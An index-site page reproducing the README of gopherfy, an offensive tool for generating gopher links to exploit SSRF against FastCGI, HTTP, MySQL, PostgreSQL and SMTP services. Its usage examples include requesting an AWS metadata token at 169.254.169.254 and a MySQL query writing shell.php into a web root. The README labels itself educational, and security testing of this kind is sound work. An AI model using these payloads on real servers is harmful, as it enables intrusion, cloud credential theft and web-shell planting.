Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/hupe1980/gopherfy
Tool to generate gopher links for exploiting SSRF
https://github.com/hupe1980/gopherfy
exploit fastcgi gopher http mysql postgresql smtp ssrf
Last synced: 2 days ago
JSON representation
Tool to generate gopher links for exploiting SSRF
- Host: GitHub
- URL: https://github.com/hupe1980/gopherfy
- Owner: hupe1980
- License: mit
- Created: 2022-10-02T07:47:43.000Z (about 2 years ago)
- Default Branch: main
- Last Pushed: 2022-10-15T22:33:16.000Z (almost 2 years ago)
- Last Synced: 2024-06-21T13:11:19.565Z (3 months ago)
- Topics: exploit, fastcgi, gopher, http, mysql, postgresql, smtp, ssrf
- Language: Go
- Homepage:
- Size: 41 KB
- Stars: 3
- Watchers: 2
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# gopherfy
[](https://pkg.go.dev/github.com/hupe1980/gopherfy)
> Tool to generate gopher links for exploiting SSRF
```
curl http://example.org/ssrf/vuln/proxy?url=$(gopherfy mysql -e url -q "show databases;")
```
:warning: This is for educational purpose. Don’t try it on live servers!
## How to use
```
Tool to generate gopher links for exploiting SSRF
Usage:
gopherfy [command]
Available Commands:
completion Generate the autocompletion script for the specified shell
fastcgi Generate fastcgi gopher link
help Help about any command
http Generate http gopher link
mysql Generate mysql gopher link
postgres Generate postgres gopher link
smtp Generate smtp gopher link
Flags:
-e, --encoder string the encoder to use. allowed: "base64", "url" or "none" (default "none")
-h, --help help for gopherfy
--send send the selector string
-v, --version version for gopherfy
Use "gopherfy [command] --help" for more information about a command.
```
## FastCGI
```
Generate fastcgi gopher link
Usage:
gopherfy fastcgi [flags]
Flags:
-a, --addr string fastcgi address (default "127.0.0.1:9000")
-c, --code string code to execute (default "")
-f, --file string absolute php file path (default "/usr/local/lib/php/System.php")
-h, --help help for fastcgi
Global Flags:
-e, --encoder string the encoder to use. allowed: "base64", "url" or "none" (default "none")
--send send the selector string
```
## HTTP
```
Generate http gopher link
Usage:
gopherfy http [flags]
Examples:
gopherfy http -a 169.254.169.254:80 -p /latest/api/token -X PUT -H X-aws-ec2-metadata-token-ttl-seconds=21600
Flags:
-a, --addr string http address (default "127.0.0.1:80")
-H, --header stringToString http header value (key=value) (default [])
-h, --help help for http
-V, --http-version string http protocol version (default "HTTP/1.0")
-p, --path string http path (default "/")
-X, --request string http request method (default "GET")
-A, --user-agent string http user agent (default "gopherfy")
Global Flags:
-e, --encoder string the encoder to use. allowed: "base64", "url" or "none" (default "none")
--send send the selector string
```
## MySQL
```
Generate mysql gopher link
Usage:
gopherfy mysql [flags]
Examples:
gopherfy mysql -q "SELECT '' INTO OUTFILE '/var/www/html/shell.php'"
Flags:
-a, --addr string mysql address (default "127.0.0.1:3306")
-d, --db string mysql database name
-h, --help help for mysql
-q, --query string mysql query
-u, --user string mysql username (default "root")
Global Flags:
-e, --encoder string the encoder to use. allowed: "base64", "url" or "none" (default "none")
--send send the selector string
```
## PostgreSQL
```
Generate postgres gopher link
Usage:
gopherfy postgres [flags]
Flags:
-a, --addr string postgres address (default "127.0.0.1:5432")
-d, --db string postgres database name
-h, --help help for postgres
-q, --query string postgres query
-u, --user string postgres username (default "postgres")
Global Flags:
-e, --encoder string the encoder to use. allowed: "base64", "url" or "none" (default "none")
--send send the selector string
```
## License
[MIT](LICENCE)